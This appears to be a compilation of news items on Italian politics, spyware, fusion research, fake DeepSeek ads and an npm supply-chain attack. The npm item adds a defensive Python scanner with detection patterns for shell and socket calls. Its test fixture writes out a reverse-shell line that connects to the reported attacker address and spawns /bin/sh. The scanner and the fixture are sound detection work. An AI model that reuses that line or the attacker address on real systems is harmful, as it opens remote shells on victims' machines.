The article “We have received your CV. Write to me on WhatsApp”: the new and irresistible Job Offer Scam comes from il blog della sicurezza informatica.




The Meloni government becomes the fifth longest-serving executive in the history of the Republic


@Politica interna, europea e internazionale
The Meloni government climbs the ranking of the longest-serving executives in the history of the Italian Republic. Today, Thursday 27 March 2025, it became the fifth longest-serving government: sworn in on 22 October 2022, it has reached 887



Custom Slimline CD Player Hides Out Under Speaker


In the era of digital streaming, the market is full of wireless speakers that will play content from your smartphone or pull it down from the Internet directly over WiFi. But if you’re feeling a bit nostalgic and want to throw on one of your old CDs, well, you might have a problem. That’s the situation [Chad Boughton] recently found himself in, so he decided to build a compact CD player that could discreetly connect up to his fancy Klipsch speaker.

The optical drive itself was the easy part, as [Chad] already had a laptop-style drive in an external enclosure that he could liberate. But of course, the speaker wouldn’t know what to do with an external disc drive, so there needed to be an intermediary. Enter the Raspberry Pi.

It might not look like it at first glance, but that’s a Pi 3 tucked into the back of the 3D printed frame. It would have been too tall in its original configuration, so [Chad] removed the USB and Ethernet ports; a modification we’ve covered in the past. Of course, he still needed to use the USB ports, so he ended up soldering the two cables — one to the CD drive and the other to the back of the speaker — directly to the Pi.

When plugged into the Raspberry Pi, the Klipsch speaker shows up as a USB audio device, so the software side of things was relatively simple. [Chad] installed VLC to handle CD playback, but he still needed a way to control everything. To that end, an IR receiver hooked up to the Pi’s GPIO pins means the Pi can detect the signals coming from the speaker’s original remote and pass the appropriate command on to VLC. The whole thing is very well integrated, and you could be forgiven for thinking it might be some kind of stock upgrade module at first glance.

Despite recently celebrating its 40th birthday, the CD is unlikely to completely disappear from our lives anytime soon. Manufacturers can turn their back on the standard if they want, but so long as folks still want to play them, they’ll keep coming up with inventive ways to make it happen.

youtube.com/embed/X92FkGoavSA?…


hackaday.com/2025/03/27/custom…



Politics and the EU: Router Freedom in the EU. The FSFE podcast - (podcast transcript here)

Have you ever used your own router to connect to the Internet? @Free Software Foundation Europe recently won a major victory in Germany for Router Freedom. In this 32nd episode of the Software Freedom Podcast, Bonnie Mehring, Alexander Sander and Lucas Lasota talk about Router Freedom and our work to protect freedom of choice of Internet devices.

@Privacy Pride

fsfe.org/news/podcast/episode-…






State spyware: the Italian government admits surveillance through the Graphite spyware


In relation to the Paragon case, the Italian government, after having rejected the accusations, has changed its version of events in the face of growing pressure from opposition parties and activists.

Now, a turning point: undersecretary Alfredo Mantovano has reportedly admitted that the Italian secret services authorized spyware surveillance of members of the NGO Mediterranea Saving Humans. However, a crucial mystery remains: who was behind the surveillance of Fanpage.it director Francesco Cancellato?

The parliamentary committee overseeing intelligence (Copasir) is investigating whether the use of the Israeli spyware complies with Italian law and whether the secret services acted within their mandate in authorizing the preventive interceptions.

While the hearings remain classified, leaks from Tuesday’s session published by La Repubblica suggest that Mantovano, who oversees the intelligence agencies, acknowledged that the government had approved surveillance of some activists. However, he maintained that Cancellato was never among the targets.

Mantovano stated that all operations were conducted in compliance with the laws governing intelligence activities, with the approval of both the Government and the Prosecutor General’s office at the Rome Court of Appeal.

He justified the surveillance by stating that Mediterranea Saving Humans, which operates in the Mediterranean rescuing migrants, had been classified as a national security concern. According to his account, the intelligence agencies were conducting a “preventive investigation into illegal immigration”.

The use of Graphite, a highly invasive military-grade spyware developed by Israel’s Paragon Solutions, was reportedly dictated by the fact that at the time it was the only tool available to the secret services. The question of who was surveilling Cancellato remains unresolved. The government continues to deny intelligence involvement, while investigations by five Italian prosecutor’s offices (Naples, Rome, Venice, Bologna and Palermo) have so far produced no definitive answers.

For now, the government has suspended its contracts with Paragon until Copasir completes its investigation. Copasir is expected to conclude its inquiry soon, after which it will present its findings to Parliament. Meanwhile, another key investigation is under way at Citizen Lab, a cybersecurity research group at the University of Toronto, which is analysing the devices of the targeted individuals to determine how Graphite infiltrated their phones.

The article State spyware: the Italian government admits surveillance through the Graphite spyware comes from il blog della sicurezza informatica.



The internet is flooded with AI-generated images in the style of Studio Ghibli, whose founder said “I would never wish to incorporate this technology into my work at all.” #News


Can Twitter X control journalists and politicians? The shocking revelation from Musk's Italian trustee gives pause for thought

The story of Andrea #Stroppa who, as a shareholder of X, boasts of being able to read its private messages, is told by @Claudia Giulia
The journalist noticed Stroppa's "gaffe" during a "space" live broadcast and reported it to the Italian Data Protection Authority

It’s Saturday, March 22, 2025. I’m getting ready to head out and take one last look at Twitter. At the top of the screen, I spot a Spaces session featuring Andrea Stroppa, a key figure in Elon Musk’s orbit, with a prominent role in Europe, especially Italy. I hesitate, but then I notice some journalists I admire - people I’ve connected with on the platform - among the listeners. Curiosity wins out, and I join. Nicola Porro is interviewing Stroppa: they’re talking about Twitter X, Musk, and Tesla. Then my connection drops, I have to leave, and I close the app. The next day, I return to the audio: it’s still there, recorded on the platform, now heard by thousands. I pick up where I left off. At the 32-minute mark, Stroppa says something that stops me cold. I rewind and listen again. I can’t believe it. In a fleeting moment - maybe a lapse - he drops a bombshell: thanks to his role as a shareholder, he can uncover the identity of any user on X, specifically mentioning anonymous accounts that criticize him. It’s a stark claim, impossible to brush off.

A revelation everyone ignores

claudiagiulia.substack.com/p/c…

@Technology



General Fusion Claims Success with Magnetized Target Fusion


It’s rarely appreciated just how much more complicated nuclear fusion is than nuclear fission. Whereas the latter involves a process that happens all around us without any human involvement, and where the main challenge is to keep the nuclear chain reaction within safe bounds, nuclear fusion means making atoms do something that goes against their very nature, outside of a star’s interior.

Fusing hydrogen isotopes can be done on Earth fairly readily these days, but doing it in a way that’s repeatable (bombs don’t count) and in a way that makes economic sense is trickier. As covered previously, plasma stability is a problem with the popular approach of tokamak-based magnetic confinement fusion (MCF). Although this core problem has now been largely addressed, and stellarators are mostly unbothered by this particular problem, a Canadian start-up figures that they can do even better, in the form of a nuclear fusion reactor based around the principle of magnetized target fusion (MTF).

Although General Fusion’s piston-based fusion reactor has left many people confused, MTF is based on real physics, and with GF’s current LM26 prototype having recently achieved first plasma, this seems like an excellent time to ask what MTF is, and whether it can truly compete with billion-dollar tokamak-based projects.

Squishing Plasma Toroids

Lawson criterion of important magnetic confinement fusion experiments (Credit: Horvath, A., 2016)
In general, to achieve nuclear fusion, the target atoms have to be pushed past the Coulomb barrier, which is an electrostatic interaction that normally prevents atoms from approaching each other and even spontaneously fusing. In stars, the process of nucleosynthesis is enabled by the intense pressures due to the star’s mass, which overcomes this electrostatic force.

Replicating the nuclear fusion process requires a similar way to overcome the Coulomb barrier, but in lieu of even a small-sized star like our Sun, we need alternate means such as much higher temperatures, alternative ways to provide pressure and longer confinement times. The efficiency of each approach was originally captured in the Lawson criterion, which was developed by John D. Lawson in a (then classified) 1955 paper (PDF on Archive.org).

In order to achieve a self-sustaining fusion reaction, the energy losses should be less than the energy produced by the reaction. The break-even point here is expressed as having a Q (energy gain factor) of 1, where the added energy and losses within the fusion process are in balance. For sustained fusion with excess energy generation, the Q value should be higher than 1, typically around 5 for contemporary fuels and fusion technology.

In the slow march towards ignition, we have seen many reports in the popular media that turn out to be rather meaningless, such as the horrendous inefficiency demonstrated by the laser-based inertial confinement fusion (ICF) at the National Ignition Facility (NIF). This makes it rather fascinating that what General Fusion is attempting is closer to ICF, just without the lasers and artisan Hohlraum-based fuel pellets.

Instead they use a plasma injector, a type of plasma railgun called a Marshall gun, that produces a hydrogen isotope plasma, which is subsequently contained in a magnetic field as a self-stable compact toroid. This toroid is then squished by a mechanical system in a matter of milliseconds, and the resulting compression induces fusion. Creating this toroid is the feat that was recently demonstrated in the current Lawson Machine 26 (LM26) prototype reactor with its first plasma in the target chamber.

Magneto-Inertial Fusion


Whereas magnetic confinement fusion does effectively what it says on the tin, magnetized target fusion is pretty much a hybrid of magnetic confinement fusion and laser-based inertial confinement fusion. Because the magnetic containment is only there to keep the plasma in a nice stable toroid, it doesn’t have nearly the same requirements as in a tokamak or stellarator. Yet rather than using complex and power-hungry lasers, MTF applies mechanical energy using an impulse driver, the liner, that rapidly compresses the low-density plasma toroid.
Schematic of the Lawson Machine 26 MTF reactor. (Credit: General Fusion)
The juiciest parts of General Fusion’s experimental setup can be found in the Research Library on the GF website. The above graphic was copied from the LM26 poster (PDF), which provides a lot of in-depth information on the components of the device and its operation, as well as the experiments that informed its construction.

The next step will be to test the ring compressor that is designed to collapse the lithium liner around the plasma toroid, compressing it and achieving fusion.

Long Road Ahead

Interpretation of General Fusion’s commercial MTF reactor design. (Credit: Evan Mason)
As promising as this may sound, there is still a lot of work to do before MTF can be considered a viable option for commercial fusion. As summarized on the Wikipedia entry for General Fusion, the goal is to have a liquid liner rather than the solid lithium liner of LM26. This liquid lithium liner would both breed new tritium fuel from neutron exposure and provide the liner that compresses the deuterium-tritium fuel.

This liquid liner would also provide cooling, linked with a heat exchanger or steam generator to generate electricity. Because the liquid liner would be infinitely renewable, it should allow for about 1 cycle per second. To keep the liquid liner in place on the inside of the sphere, it would need to be constantly spun, further complicating the design.

Although getting plasma in the reaction chamber where it can be squished by the ring compressor’s lithium liner is a major step, the real challenge will be in moving from a one-cycle-a-day MTF prototype to something that can integrate not only the aforementioned features, but also run one cycle per second, while being more economical to run than tokamaks, stellarators, or even regular nuclear fission plants, especially Gen IV fast neutron reactors.

That said, there is a strong argument to be made that MTF is significantly more practical for commercial power generation than ICF. And regardless, it is just really cool science and engineering.

Top image: General Fusion’s Lawson Machine 26. (Credit: General Fusion)


hackaday.com/2025/03/27/genera…



DeepSeek or DeepScam? When Google makes you download a virus with one click!


The rapid growth in DeepSeek’s popularity, amid privacy controversies, has attracted the attention not only of users but also of cybercriminals. Fake advertisements disguised as official Google search results have appeared online in an attempt to spread malware. The attackers targeted people who typed queries into a search engine and absent-mindedly clicked on the first links.

According to research by Malwarebytes specialists, Google Ads is actively hosting fake ads impersonating DeepSeek. At first glance, the differences from the real result are hard to spot, especially for an inexperienced user. Clicking such a link is enough to land on a fake site, built with particular attention to visual authenticity.

One of these sites fully copies the look of the official DeepSeek site, but actually leads to the download of a Trojan written in MSIL (Microsoft Intermediate Language). The malicious code is triggered when the user tries to download the “search engine” and is run on the victim’s system.

Fake DeepSeek website (Malwarebytes)

The criminals count on the credibility of Google’s sponsored results. The system allows such ads to occupy the top positions, even above the brands’ official websites. This makes fake advertising particularly dangerous. The scammers pay considerable sums for placement, which shows how effective the deception is.

One of the fake sites was created in the name of an advertiser whose name is written in Hebrew: תמיר כץ. This is another warning sign: such details are hard to notice in a hurry, especially if the user does not know what a genuine DeepSeek ad should look like.

Malware advertiser information (Malwarebytes)

To prevent infection, experts recommend avoiding sponsored links altogether. They also advise clicking the three dots next to the URL in the search results: this reveals who owns the ad. If in doubt about the advertiser’s name, it is better to go back to the organic results.

Fake (top) and genuine (bottom) DeepSeek ads (Malwarebytes)

To block sponsored links entirely, you can install an ad blocker. This removes the risk of accidentally visiting a malicious site. In a situation where Google cannot guarantee the safety of its ads, such measures become particularly relevant.

The article DeepSeek or DeepScam? When Google makes you download a virus with one click! comes from il blog della sicurezza informatica.




Passaggio a Sud Est (Passage to the South-East). Europe’s borders in the time of the new Cold War

@Politica interna, europea e internazionale

Today, Thursday 27 March, the launch event for Startmag’s quarterly “Passaggio a Sud Est” takes place; from 15:30 to 16:30 Renata Gravina will attend on behalf of the Foundation. The Fondazione Luigi Einaudi in Rome contributed to the



New supply chain attack! Invisible malware infects trusted NPM libraries


Attackers have introduced a new tactic in attacks on the npm ecosystem: two malicious packages secretly modify legitimate libraries already installed on the system to embed a reverse shell and provide persistent access to the victim’s system. Even after the malicious packages are removed, the backdoor keeps working because it is hidden in a modified version of a trusted package.

The discovery comes from ReversingLabs researchers who study software supply chains. Although the malicious libraries are not yet widespread, the researchers warn of the danger they pose. According to them, malware loaders appear on npm from time to time, although infostealers are more common. In this case, however, a particularly sophisticated strategy was used to hide the malicious payload, and it deserves special attention.

The packages discovered are named “ethers-provider2” and “ethers-providerz”. The first, which was still available on npm at the time of publication, is based on the popular “ssh2” library. Unlike the original, however, it has a modified install script, “install.js”. Once loaded, the script downloads the second stage of the malicious code from an external source, runs it and then deletes it, trying to leave no traces.

The second stage checks whether the well-known “ethers” package is installed on the system. If so, it replaces the file provider-jsonrpc.js with a modified version containing malware. That code, in turn, connects to a remote host, from which the third stage is loaded: a fully functional reverse shell. Its implementation is based on a modified SSH client that masquerades as legitimate behaviour of the ssh2 library.

The key point is that removing “ethers-provider2” does not remove the backdoor: the infected file in the ethers library remains active. This means the user’s system stays compromised even if the malicious module is no longer installed.

The second malicious package, “ethers-providerz”, works similarly but targets another popular module: @ethersproject/providers. It likewise injects a malicious payload into the legitimate library and installs a reverse shell pointing to the same attacker IP address: 5[.]199[.]166[.]1:31337.

According to ReversingLabs, early versions of “ethers-providerz” contained errors in the file paths that prevented the attack from working. The author has since removed the package from npm, which may indicate an intention to improve it and republish it. During the investigation, the experts also identified two additional packages, “reproduction-hardhat” and “@theoretical123/providers”, which may be related to the same malicious campaign.

To detect the threat, ReversingLabs has published a YARA rule designed to identify the known malware components. Developers are advised to check their environments and make sure there are no signs of compromise.

The analysts stress the importance of reviewing source code and the trustworthiness of developers when installing packages from public repositories such as npm or PyPI. Pay particular attention to obfuscated code, external connections and suspicious actions in install scripts.
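The two checks the article points at, install-time hooks and a trusted file that has started doing network and process work it never did before, are easy to automate. The following is an added example, not code from ReversingLabs or from the npm project: it walks a node_modules tree, lists every package that declares a preinstall/install/postinstall/prepare script, and flags JavaScript files that pull in child_process or net, call exec/spawn, or embed a literal IP address. The indicator patterns, the function names and the sample tree are this example’s own constructions; the tree contains a stand-in for a tampered ethers provider-jsonrpc.js (dialling the address the article reports), a clean @ethersproject/providers file, and a dropper package with an install hook, so the audit can run offline.

```python
import json
import re
import tempfile
from pathlib import Path

# Things an RPC provider module has no business doing; tune these to your own code base.
INDICATORS = {
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "raw_socket": re.compile(r"""require\(\s*['"]net['"]\s*\)|\.connect\(\s*\d+"""),
    "ip_literal": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "shell_exec": re.compile(r"\b(?:exec|execSync|spawn|spawnSync)\s*\("),
}
# npm runs these hooks automatically when the package is installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_lifecycle_scripts(node_modules):
    """List (package, hook, command) for every installed package that runs code at install time."""
    hits = []
    for manifest in sorted(Path(node_modules).rglob("package.json")):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        scripts = meta.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                hits.append((meta.get("name", manifest.parent.name), hook, scripts[hook]))
    return hits


def scan_for_indicators(node_modules):
    """Map relative path -> matched indicator names for every .js file under node_modules."""
    root = Path(node_modules)
    findings = {}
    for js in sorted(root.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        matched = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if matched:
            findings[js.relative_to(root).as_posix()] = matched
    return findings


def audit(node_modules):
    """One report with both views: who runs code at install time, and which files look wrong."""
    return {
        "install_hooks": find_lifecycle_scripts(node_modules),
        "indicators": scan_for_indicators(node_modules),
    }


def build_sample_tree():
    """Constructed node_modules for the demo: a tampered ethers, a clean
    @ethersproject/providers, and a dropper package with an install hook."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    files = {
        "ethers/package.json": json.dumps({"name": "ethers"}),
        # stand-in for the patched provider file; the address is the C2 reported in the article
        "ethers/lib/providers/provider-jsonrpc.js": (
            '"use strict";\n'
            'const net = require("net");\n'
            'const { spawn } = require("child_process");\n'
            'net.connect(31337, "5.199.166.1", () => spawn("/bin/sh"));\n'
            'module.exports = require("./json-rpc-provider");\n'
        ),
        "@ethersproject/providers/package.json": json.dumps({"name": "@ethersproject/providers"}),
        "@ethersproject/providers/lib/json-rpc-provider.js": (
            '"use strict";\n'
            'const { BaseProvider } = require("./base-provider");\n'
            "class JsonRpcProvider extends BaseProvider {}\n"
            "module.exports = { JsonRpcProvider };\n"
        ),
        "ethers-provider2/package.json": json.dumps(
            {"name": "ethers-provider2", "scripts": {"install": "node install.js"}}
        ),
        "ethers-provider2/install.js": (
            'const { execSync } = require("child_process");\n'
            "// constructed stand-in for the stage-2 dropper\n"
        ),
    }
    for rel, content in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    print(json.dumps(audit(build_sample_tree()), indent=2))
```

The regexes are heuristics, not a verdict: the IP pattern will also match four-part version strings, and a real dropper can obfuscate every one of these tokens. They are useful because a file such as provider-jsonrpc.js has a known, narrow job, so any hit there is worth a diff against the registry tarball. Note that the integrity hashes in package-lock.json cover the tarball as downloaded and say nothing about files rewritten in node_modules afterwards, which is exactly the gap this campaign exploits.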

The article New supply chain attack! Invisible malware infects trusted NPM libraries comes from il blog della sicurezza informatica.